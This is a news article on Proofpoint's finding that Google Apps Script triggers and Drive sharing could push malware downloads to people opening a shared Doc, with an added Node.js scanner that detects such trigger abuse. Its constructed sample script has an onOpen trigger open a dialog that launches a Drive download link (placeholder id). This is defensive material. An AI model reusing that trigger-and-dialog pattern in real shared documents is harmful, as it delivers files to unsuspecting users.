
SaaS platforms - The new Wild West of malware

09 Jan 18

Proofpoint researchers have identified a vulnerability that allows attackers to leverage Google Apps Script to automatically download arbitrary malware hosted in Google Drive to a victim's computer. 

Google Apps Script is a development platform based on JavaScript that allows both the creation of standalone web apps and powerful extensions to various elements of the Google Apps SaaS ecosystem. 

Proofpoint research has found that Google Apps Script and the normal document sharing capabilities built into Google Apps supported automatic malware downloads and sophisticated social engineering schemes designed to convince recipients to execute the malware once it has been downloaded. 

Proofpoint also confirmed that it was possible to trigger exploits with this type of attack without user interaction, making it all the more urgent that organisations mitigate these threats before they reach end users, whenever possible.

Proofpoint's exploit began by uploading malicious files or malware executables to Google Drive and creating a public link to them, which is something any threat actor can do. 

Actors could then share an arbitrary Google Doc to be used as a lure and vehicle for a Google Apps Script that delivers the shared malware.

While Proofpoint frequently observes Google Docs phishing and malware distribution via links to Google Drive URLs, extensible SaaS platforms allow greater degrees of sophistication, malware propagation, and automation that are also much more difficult to detect. 

Because recipients receive a legitimate link to edit a Google Doc, as many people do every day, the old rules of email hygiene apply here as much as ever. 

Google has imposed new restrictions on simple triggers to block phishing and malware distribution attempts that are triggered by opening a doc. 

However, recipients should also exercise caution when clicking links, even links to Google Docs, unless they know or can verify the sender. 

Moreover, this vulnerability automatically downloaded a malicious file and then relied on social engineering to convince the recipient to open it. Users should be wary of files automatically downloaded by web-based or SaaS platforms and should recognise the anatomy of a social engineering attack, while organisations should focus on mitigating these threats before they reach end users where possible.

Since Proofpoint disclosed this vulnerability to Google, the company has added specific restrictions on certain Apps Script events that could potentially be abused. 

Google now blocks both installable triggers (configurable event hooks that run a script function automatically when, for example, a document is opened or edited) and simple triggers like onOpen and onEdit from presenting custom interfaces in Docs editors in another user's session. 

However, the proof of concept Proofpoint provided to Google and recently presented at the DeepSec Conference demonstrates the ability of threat actors to use extensible SaaS platforms to deliver malware to unsuspecting victims in even more powerful ways than they have with Microsoft Office macros over the last several years. 

Moreover, the limited number of defensive tools available to organisations and individuals against this type of threat makes it likely that threat actors will attempt to abuse and exploit these platforms more often as we become more adept at protecting against macro-based threats.

SaaS platforms remain a “Wild West” for threat actors and defenders alike.

New tools like Google Apps Script are rapidly adding functionality while threat actors look for novel ways of abusing these platforms.

At the same time, few tools exist that can detect threats generated by or distributed via legitimate software-as-a-service (SaaS) platforms.

This creates considerable opportunities for threat actors who can leverage newfound vulnerabilities or use “good for bad”: making use of legitimate features for malicious purposes.
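Given the delivery chain described earlier (a shared Doc carrying a bound script whose simple trigger pushes a Drive-hosted file at the reader) and the point just made that few tools inspect what SaaS platforms generate, the following is an added example, not Proofpoint's proof of concept and not any Google tooling: a small Node.js heuristic scanner over Apps Script source text (.gs files, for instance exported from a project) that flags simple triggers (onOpen, onEdit, onInstall) whose reachable code shows an HtmlService dialog or sidebar, touches DriveApp or UrlFetchApp, or embeds a Drive download URL. The rule list, the rule names, and both sample scripts are constructed for the illustration. It walks braces and regexes rather than parsing JavaScript, so string literals containing braces can confuse it.

```javascript
// Added example (not Proofpoint's or Google's code): heuristic scanner for
// Google Apps Script source that flags simple triggers whose reachable code
// could present UI or push a file at whoever opens a shared document.

// Simple triggers fire in the opening user's session without installation.
const SIMPLE_TRIGGERS = ['onOpen', 'onEdit', 'onInstall'];

// Constructed rule list: APIs and URL shapes that, inside a trigger's reach,
// suggest a custom interface or a Drive/fetch-based file delivery.
const RISKY_RULES = [
  { id: 'html-service', re: /\bHtmlService\b/ },
  { id: 'modal-dialog', re: /\bshowModalDialog\s*\(/ },
  { id: 'sidebar', re: /\bshowSidebar\s*\(/ },
  { id: 'drive-app', re: /\bDriveApp\b/ },
  { id: 'url-fetch', re: /\bUrlFetchApp\b/ },
  { id: 'download-url', re: /getDownloadUrl\s*\(|drive\.google\.com\/uc\?/ },
];

// Return {name, body} for each top-level `function name(...) { ... }` by
// counting braces from the opening one. Nested functions stay inside the
// enclosing body; strings containing braces are not handled (heuristic only).
function extractFunctions(src) {
  const out = [];
  const re = /\bfunction\s+([A-Za-z_$][\w$]*)\s*\([^)]*\)\s*\{/g;
  let m;
  while ((m = re.exec(src)) !== null) {
    let depth = 1;
    let i = re.lastIndex;
    while (i < src.length && depth > 0) {
      if (src[i] === '{') depth++;
      else if (src[i] === '}') depth--;
      i++;
    }
    out.push({ name: m[1], body: src.slice(re.lastIndex, i - 1) });
    re.lastIndex = i; // resume after this function's closing brace
  }
  return out;
}

// Concatenate a function's body with the bodies of every in-file function it
// calls, transitively, so a trigger cannot hide the risky call in a helper.
function reachableBody(fn, byName) {
  const seen = new Set();
  const stack = [fn];
  let text = '';
  while (stack.length) {
    const cur = stack.pop();
    if (seen.has(cur.name)) continue;
    seen.add(cur.name);
    text += cur.body + '\n';
    const callRe = /\b([A-Za-z_$][\w$]*)\s*\(/g;
    let m;
    while ((m = callRe.exec(cur.body)) !== null) {
      const callee = byName.get(m[1]);
      if (callee) stack.push(callee);
    }
  }
  return text;
}

// Scan one script's source; returns [{trigger, hits}] for each simple trigger
// whose reachable code matches at least one rule (empty array when clean).
function scanAppsScript(src) {
  const fns = extractFunctions(src);
  const byName = new Map(fns.map((f) => [f.name, f]));
  const findings = [];
  for (const f of fns) {
    if (!SIMPLE_TRIGGERS.includes(f.name)) continue;
    const reach = reachableBody(f, byName);
    const hits = RISKY_RULES.filter((r) => r.re.test(reach)).map((r) => r.id);
    if (hits.length) findings.push({ trigger: f.name, hits });
  }
  return findings;
}

// Constructed sample: a benign bound script that only adds a menu item.
const BENIGN_SOURCE = `
function onOpen() {
  DocumentApp.getUi().createMenu('Review').addItem('Count', 'countWords').addToUi();
}
function countWords() {
  var text = DocumentApp.getActiveDocument().getBody().getText();
  Logger.log(text.split(' ').length);
}
`;

// Constructed sample: the trigger delegates to a helper that opens a dialog
// pointing the reader's browser at a Drive download link (placeholder id).
const SUSPICIOUS_SOURCE = `
function onOpen() {
  pushFile();
}
function pushFile() {
  var html = HtmlService.createHtmlOutput(
    '<script>window.open("https://drive.google.com/uc?export=download&id=FILE_ID_PLACEHOLDER")</script>');
  DocumentApp.getUi().showModalDialog(html, 'Loading');
}
`;

console.log(JSON.stringify(scanAppsScript(BENIGN_SOURCE)));
console.log(JSON.stringify(scanAppsScript(SUSPICIOUS_SOURCE), null, 2));
```

Run it with `node scanner.js`; the benign sample yields no findings, while the suspicious one reports the onOpen trigger with the html-service, modal-dialog and download-url rules, even though the risky calls live in the helper rather than in the trigger itself. Feeding every .gs file of a bound script into `scanAppsScript` before a shared document is allowed into a tenant is the kind of check the page says is otherwise missing.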

With malicious Microsoft Office macros, threat actors introduced layers of obfuscation, new techniques, and innovative approaches designed to better deliver malware payloads.

The same level of innovation is likely as SaaS applications become increasingly mainstream and threat actors become more sophisticated in their abuse of these tools.

Organisations will need to apply a combination of SaaS application security, end-user education, endpoint security, and email gateway security to stay ahead of the curve of this emerging threat.
